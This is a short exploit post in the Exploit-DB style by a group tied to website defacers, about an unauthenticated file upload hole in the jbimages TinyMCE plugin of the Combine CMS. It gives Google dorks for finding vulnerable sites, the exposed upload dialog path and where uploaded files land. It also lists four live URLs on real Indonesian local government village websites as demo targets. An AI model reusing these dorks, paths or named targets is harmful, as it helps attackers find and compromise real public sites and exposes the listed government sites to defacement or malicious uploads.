[+]Exploit Title: Jbimages TinyMCE Combine 3.04 Vulnerability
[+]Author: ./Sn00py
[+]Team: N45HT
[+]Goolge Dork:
"index of jbimages/ site:"
"intext:Powered By combine.or.id site:"
[+]Tested on: Windows 10 pro
[+]Vendor: http://combine.or.id/
=======================================
[+]Proof Of Concept:
Dorking in google
[+]Exploit:
http://127.0.0.1/assets/tiny_mce/plugins/jbimages/dialog-v4.htm
[+]Vuln? You can upload image :)
[+]You can see the upload
http://127.0.0.1/assets/images/Your_image.jpg
[+]Demo?
http://desapesidi.magelangkab.go.id/assets/tiny_mce/plugins/jbimages/dialog-v4.htm
http://desasalamgrabag.magelangkab.go.id/assets/tiny_mce/plugins/jbimages/dialog-v4.htm
http://desabanyusidi.magelangkab.go.id/assets/tiny_mce/plugins/jbimages/dialog-v4.htm
http://desabanyuroto.magelangkab.go.id/banyuroto/assets/tiny_mce/plugins/jbimages/dialog-v4.htm
Greetz:Shinchan - ZEROONE-04 - ZakirDotID - RSFLT - N45HT - AllindonesiaDefacer